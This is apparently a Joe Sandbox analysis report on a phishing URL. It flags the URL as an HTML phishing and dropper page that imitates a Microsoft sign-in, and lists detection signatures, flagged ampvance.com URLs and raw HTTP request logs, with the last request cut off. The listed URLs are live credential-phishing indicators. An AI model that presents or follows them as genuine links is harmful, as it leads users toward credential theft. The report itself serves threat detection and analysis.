Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://rfpcertstream.castlehillinfotech.com/satin/x4/cg1-b1m/

Overview

General Information

Sample URL:https://rfpcertstream.castlehillinfotech.com/satin/x4/cg1-b1m/
Analysis ID:1403434
Infos:

Detection

HtmlDropper, HTMLPhisher
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected Html Dropper
Yara detected HtmlPhish10
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
HTML body contains low number of good links
HTML page contains hidden URLs or javascript code
HTML title does not match URL
Invalid 'sign-in options' or 'sign-up' link found
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • chrome.exe (PID: 6620 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3472 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2412 --field-trial-handle=2380,i,5816646671808704860,14953583853610875353,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 4280 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "https://rfpcertstream.castlehillinfotech.com/satin/x4/cg1-b1m/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
3.7.pages.csvJoeSecurity_HtmlDropper_3Yara detected Html DropperJoe Security
    3.7.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      4.8.pages.csvJoeSecurity_HtmlDropper_3Yara detected Html DropperJoe Security
        4.8.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: https://ampvance.com/jq/3485ef1ed169dedf7c7dc623777c6a8065e71d2e3a2b9Avira URL Cloud: Label: phishing
          Source: https://ampvance.com/ASSETS/img/m_.svgAvira URL Cloud: Label: phishing
          Source: https://ampvance.com/1Avira URL Cloud: Label: phishing
          Source: https://ampvance.com/APP-3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cee1/3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cee2Avira URL Cloud: Label: phishing
          Source: https://ampvance.com/boot/3485ef1ed169dedf7c7dc623777c6a8065e71d2e3a2bfAvira URL Cloud: Label: phishing
          Source: https://ampvance.com/ASSETS/img/sig-op.svgAvira URL Cloud: Label: phishing
          Source: https://ampvance.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=85fa6d536af119ebAvira URL Cloud: Label: phishing
          Source: https://ampvance.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1869225531:1709641461:kuxJ_DvE-BzM62NrsAoJvN18Oo0XGBWfSTPIHUFJYAY/85fa6d536af119eb/a96d5f6b92698dcAvira URL Cloud: Label: phishing
          Source: https://ampvance.com/js/3485ef1ed169dedf7c7dc623777c6a8065e71d2e3a2c1Avira URL Cloud: Label: phishing
          Source: https://ampvance.com/favicon.icoAvira URL Cloud: Label: phishing
          Source: https://ampvance.com/x/3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cee7Avira URL Cloud: Label: phishing
          Source: https://ampvance.com/o/3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cf01Avira URL Cloud: Label: phishing

          Phishing

          barindex
          Source: Yara matchFile source: 3.7.pages.csv, type: HTML
          Source: Yara matchFile source: 4.8.pages.csv, type: HTML
          Source: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4Matcher: Found strong image similarity, brand: MICROSOFT
          Source: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4Matcher: Template: microsoft matched
          Source: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4#Matcher: Template: microsoft matched
          Source: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4HTTP Parser: Number of links: 0
          Source: https://ampvance.com/HTTP Parser: Base64 decoded: https://ampvance.com/
          Source: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4HTTP Parser: Title: Sign in to the Best Productivity Provider! does not match URL
          Source: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4HTTP Parser: Invalid link: get a new Microsoft account
          Source: https://ampvance.com/HTTP Parser: No favicon
          Source: https://ampvance.com/HTTP Parser: No favicon
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/rdp8q/0x4AAAAAAADnPIDROrmt1Wwj/light/normalHTTP Parser: No favicon
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/rdp8q/0x4AAAAAAADnPIDROrmt1Wwj/light/normalHTTP Parser: No favicon
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/rdp8q/0x4AAAAAAADnPIDROrmt1Wwj/light/normalHTTP Parser: No favicon
          Source: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4HTTP Parser: No favicon
          Source: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4HTTP Parser: No <meta name="author".. found
          Source: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4HTTP Parser: No <meta name="copyright".. found
          Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.5:49714 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.5:49717 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49703 version: TLS 1.2
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /satin/x4/cg1-b1m/ HTTP/1.1Host: rfpcertstream.castlehillinfotech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: rfpcertstream.castlehillinfotech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfpcertstream.castlehillinfotech.com/satin/x4/cg1-b1m/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=l6ar9h92mlej1gtsviqvnkqtjg
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://rfpcertstream.castlehillinfotech.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=85fa6d536af119eb HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ampvance.com/?__cf_chl_rt_tk=ofrAzQxhDkdZHcWLEg_Wi9Vk78IW3.fGcYWaXdEDm1g-1709645074-0.0.1.1-1557Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ampvance.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/a0d8959cb7d0/api.js?onload=lDtWXt4&render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ampvance.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ampvance.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/rdp8q/0x4AAAAAAADnPIDROrmt1Wwj/light/normal HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1869225531:1709641461:kuxJ_DvE-BzM62NrsAoJvN18Oo0XGBWfSTPIHUFJYAY/85fa6d536af119eb/a96d5f6b92698dc HTTP/1.1Host: ampvance.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=85fa6d617a504235 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/rdp8q/0x4AAAAAAADnPIDROrmt1Wwj/light/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/rdp8q/0x4AAAAAAADnPIDROrmt1Wwj/light/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/85fa6d617a504235/1709645077930/05ec081f2474c7b76f8a6c143f0f205ebf76eece6eeae1272067e1746485a5f2/-9pEA90tLAniFfr HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/rdp8q/0x4AAAAAAADnPIDROrmt1Wwj/light/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1183635583:1709641629:fYb9hZweqxu5iZMV1wvhRAEVl-boZlvEU6H59iz174E/85fa6d617a504235/e4bc76bcbb19b36 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/85fa6d617a504235/1709645077934/5cNZbzk38vkU6ml HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/rdp8q/0x4AAAAAAADnPIDROrmt1Wwj/light/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/85fa6d617a504235/1709645077934/5cNZbzk38vkU6ml HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1183635583:1709641629:fYb9hZweqxu5iZMV1wvhRAEVl-boZlvEU6H59iz174E/85fa6d617a504235/e4bc76bcbb19b36 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1183635583:1709641629:fYb9hZweqxu5iZMV1wvhRAEVl-boZlvEU6H59iz174E/85fa6d617a504235/e4bc76bcbb19b36 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1869225531:1709641461:kuxJ_DvE-BzM62NrsAoJvN18Oo0XGBWfSTPIHUFJYAY/85fa6d536af119eb/a96d5f6b92698dc HTTP/1.1Host: ampvance.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ampvance.com/?__cf_chl_tk=ofrAzQxhDkdZHcWLEg_Wi9Vk78IW3.fGcYWaXdEDm1g-1709645074-0.0.1.1-1557Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4 HTTP/1.1Host: ampvance.comConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Referer: https://ampvance.com/?__cf_chl_tk=ofrAzQxhDkdZHcWLEg_Wi9Vk78IW3.fGcYWaXdEDm1g-1709645074-0.0.1.1-1557Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
          Source: global trafficHTTP traffic detected: GET /jq/3485ef1ed169dedf7c7dc623777c6a8065e71d2e3a2b9 HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 